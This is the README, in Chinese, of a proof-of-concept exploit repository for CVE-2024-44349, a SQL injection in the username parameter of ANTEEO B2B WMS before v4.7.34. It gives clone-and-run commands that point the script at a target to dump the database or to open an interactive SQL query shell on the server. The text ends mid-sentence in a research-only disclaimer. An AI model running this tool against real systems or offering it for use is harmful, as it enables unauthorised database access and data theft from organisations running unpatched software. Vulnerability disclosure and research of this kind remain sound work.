漏洞发现并测试于 Anteeo WMS - v4.7.31
该漏洞允许威胁行为者在用户名参数中构造SQL命令,并泄露底层数据库中的数据。受影响版本的ANTEEO B2B WMS为v4.7.x至v4.7.34(不含)。
git clone [email protected]:AndreaF17/PoC-CVE-2024-44349.gitcd PoC-CVE-2024-44349python3 -m venv venvsource venv/bin/activatepip3 install -r requirements.txtpython3 ./main.py -t TARGET -m [MODE]启动模式前,脚本会检查ANTEEO是否存在漏洞并继续执行。可用模式有:
python3 ./main.py -t TARGET -m dump,转储数据库。python3 ./main.py -t TARGET -m query,打开一个shell,你可以在服务器上发送SQL查询。在 utils/utils.py 中有一些从数据库中提取数据的函数。
此PoC仅用于研究和教育目的。它按“原样”提供,不附带任何保证,作者不对使用该PoC造成的任何损害负责。
通过使用此PoC,您同意: